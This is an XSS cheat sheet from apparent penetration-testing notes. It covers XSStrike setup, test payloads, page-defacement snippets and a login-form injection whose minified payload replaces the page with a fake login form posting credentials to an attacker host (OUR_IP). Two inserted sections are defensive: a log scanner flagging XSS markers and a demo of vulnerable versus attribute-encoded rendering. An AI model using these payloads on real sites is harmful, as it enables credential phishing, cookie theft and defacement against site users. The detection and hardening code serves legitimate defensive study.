PRIMARY CATEGORY → WEB ATTACKS

Components



Discovery

Automatic
XSS Strike
  • Setup
git clone https://github.com/s0md3v/XSStrike XSStrike
cd XSStrike && python3 -m venv .venv
. .venv/bin/activate && pip3 install -r requirements.txt
  • Usage

GET

python3 xsstrike.py --url '<URL>?<PARAM>=<VALUE>&<PARAM>=<VALUE>'

POST

python3 xsstrike.py --url '<URL>' --data '<PARAM>=<VALUE>'

Testing Payloads

General
<script>alert(location.origin)</script> # Useful on IFRAME Contexts
<script>alert(document.domain)</script>
<img src=x onerror=alert(location.origin)>
<svg onload=alert(location.origin)>
Cookies
alert(document.cookie)
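Added example (not part of the original notes): a detector that decodes query-string parameters from web-server access-log lines and flags the probe markers used by the payloads above. The log lines are constructed for the demo, and the field layout and function names are assumptions.

```javascript
// Added example, not from the original notes: decode query-string parameters
// from web-server access-log lines and flag the XSS probe markers listed above.
// Log lines are constructed for the demo; the field layout is an assumption.

const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
  '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /search?q=%3Cscript%3Ealert(location.origin)%3C/script%3E HTTP/1.1" 200 512',
  '203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /view?img=x%27%20onerror%3Dalert(document.domain)%3E HTTP/1.1" 200 512',
  '203.0.113.9 - - [10/Oct/2023:13:55:42 +0000] "GET /view?img=%3Csvg%20onload%3Dalert(document.cookie)%3E HTTP/1.1" 200 512',
];

// Markers taken from the test payloads above; each is tested against the
// fully decoded parameter value.
const XSS_MARKERS = [
  { name: 'script-tag',    re: /<\s*script\b/i },
  { name: 'event-handler', re: /\bon(?:error|load)\s*=/i },
  { name: 'cookie-access', re: /document\.cookie/i },
];

// Decode twice so a double-encoded value (%253C) is still caught; stop on a
// malformed escape rather than throwing.
function decodeParam(value) {
  let out = value.replace(/\+/g, ' ');
  for (let round = 0; round < 2; round++) {
    try { out = decodeURIComponent(out); } catch { break; }
  }
  return out;
}

// Parse one log line; returns null if it carries no request line.
function scanLogLine(line) {
  const m = /"(?:GET|POST|PUT|PATCH|DELETE)\s+(\S+)\s+HTTP\/[\d.]+"/.exec(line);
  if (!m) return null;
  const url = new URL(m[1], 'http://log.invalid');
  const hits = [];
  // Walk the raw query so our own decoding (not the URL parser's) is applied.
  for (const pair of url.search.slice(1).split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const param = eq === -1 ? pair : pair.slice(0, eq);
    const value = decodeParam(eq === -1 ? '' : pair.slice(eq + 1));
    const markers = XSS_MARKERS.filter((mk) => mk.re.test(value)).map((mk) => mk.name);
    if (markers.length) hits.push({ param, value, markers });
  }
  return { client: line.split(' ')[0], path: url.pathname, hits };
}

// Return only the lines that carry at least one marker.
function findXssProbes(lines) {
  return lines.map(scanLogLine).filter((r) => r && r.hits.length > 0);
}

for (const finding of findXssProbes(SAMPLE_LOG)) {
  console.log(finding.client, finding.path, JSON.stringify(finding.hits));
}
```

Run with `node` and the three probing requests are listed with the decoded parameter value and which marker matched; the plain `q=shoes` request is not reported. The marker list is deliberately short and tied to the payloads above; a production rule set would cover more handlers and encodings.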
Resources

PayloadAllTheThings

Payload-Box


Web Defacement

Changing Background
Background Color
document.body.style.background = "<COLOR>"
Background Image
document.body.background = "<IMAGE_URL>"
Changing Page Title
document.title = "<STRING>"
Changing Page Text
document.getElementById("<HTML_TAG_ID>").innerHTML = "<STRING>"

JQuery

$("#<HTML_TAG_ID>").html('<STRING>');
Changing the entire HTML Code of the Body
document.getElementsByTagName('body')[0].innerHTML = "<STRING>"

Login Form Injection

Login Form

Sample

<h3>Please login to continue</h3>
<form action=http://OUR_IP>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>
Payload

First, we have to look for an injection point vulnerable to XSS. Once we find it, we can modify the HTML code from the client side by running the JavaScript payload below.

  • Injection Point

GET Parameter

https://www.domain.com?url=<USER_INPUT>
  • Reflected Input in the HTTP Response
...<SNIP>...
<img src='<USER_INPUT>'>
...<SNIP>...
  • Escaping the context

JS Execution on HTML Attribute

We leverage the img tag itself: the payload closes the src attribute and adds JavaScript through an onerror event-handler attribute.

x' onerror=alert(location.origin)> <!--

JS Execution within an SCRIPT tag

In this case, we close the entire img tag context and add a script tag containing the JavaScript code.

'><script>alert(document.cookie)</script> <!--
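Added example (not code from the original notes): the reflection described above, `<img src='<USER_INPUT>'>`, rendered in its vulnerable form and in a hardened form with attribute encoding, plus a small start-tag tokenizer that shows which attributes a browser would actually parse from each result. The base URL reuses the GET-parameter example above; function names are assumptions for the demo.

```javascript
// Added example, not from the original notes. It reproduces the reflection
// <img src='<USER_INPUT>'> in a vulnerable and a hardened form and tokenizes
// the result the way a browser would, to show why the breakout payloads above
// work against one and not the other. Names are assumptions for the demo.

const PAGE_BASE = 'https://www.domain.com/'; // from the GET-parameter example above

// Encode every character that can terminate an attribute value or open a tag.
function encodeForHtmlAttribute(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Encoding stops breakout but does not validate the URL itself; only allow
// http(s) so the src attribute cannot carry another scheme.
function allowedUrl(value) {
  try {
    const u = new URL(value, PAGE_BASE);
    return u.protocol === 'https:' || u.protocol === 'http:';
  } catch { return false; }
}

// Vulnerable: raw interpolation, exactly the pattern the notes exploit.
function renderVulnerable(userInput) {
  return `<img src='${userInput}'>`;
}

// Hardened: scheme check, then attribute encoding of whatever is emitted.
function renderHardened(userInput) {
  const src = allowedUrl(userInput) ? userInput : '';
  return `<img src='${encodeForHtmlAttribute(src)}'>`;
}

// Tokenize the first start tag as a browser would: quoted values run to the
// matching quote, unquoted values end at whitespace or '>'. Returns the
// attribute names seen and the markup left after the tag closes.
function parseFirstTag(html) {
  let i = html.indexOf('<') + 1;
  const skipWs = () => { while (i < html.length && /\s/.test(html[i])) i++; };
  const readName = () => {
    const s = i;
    while (i < html.length && !/[\s=\/>]/.test(html[i])) i++;
    return html.slice(s, i);
  };
  const tag = readName().toLowerCase();
  const attrs = [];
  while (i < html.length) {
    skipWs();
    if (html[i] === '>') { i++; break; }
    if (html[i] === '/') { i++; continue; }
    const name = readName();
    if (!name) { i++; continue; }
    attrs.push(name.toLowerCase());
    skipWs();
    if (html[i] === '=') {
      i++;
      skipWs();
      const q = html[i];
      if (q === '"' || q === "'") {
        const end = html.indexOf(q, i + 1);
        i = end === -1 ? html.length : end + 1;
      } else {
        while (i < html.length && !/[\s>]/.test(html[i])) i++;
      }
    }
  }
  return { tag, attrs, rest: html.slice(i) };
}

// True if the rendered markup gained an event-handler attribute or a new tag.
function escapesContext(html) {
  const { attrs, rest } = parseFirstTag(html);
  return attrs.some((a) => a.startsWith('on')) || /<[a-z]/i.test(rest);
}

// The two breakout payloads from the notes above.
const ATTRIBUTE_BREAKOUT = "x' onerror=alert(location.origin)> <!--";
const TAG_BREAKOUT = "'><script>alert(document.cookie)</script> <!--";

for (const payload of [ATTRIBUTE_BREAKOUT, TAG_BREAKOUT]) {
  console.log('vulnerable:', escapesContext(renderVulnerable(payload)), renderVulnerable(payload));
  console.log('hardened:  ', escapesContext(renderHardened(payload)), renderHardened(payload));
}
```

The vulnerable output parses as `img` with attributes `src` and `onerror` (first payload) or as `img` followed by a new `script` element (second payload); the hardened output parses as `img` with a single `src` attribute in both cases, while a benign `https://` image URL renders identically in both versions. Output encoding is the fix for the reflection itself; a Content-Security-Policy whose `script-src` omits `'unsafe-inline'` additionally stops the inline handlers and script tags shown here from executing, and `form-action 'self'` keeps a form injected the way the next section describes from posting to an external host.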
  • Minified Payload

To carry out the phishing, replace the standard alert payload with the code below, which adds a form that sends the entered credentials to an HTTP server controlled by the attacker.

document.body.innerHTML = '<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>'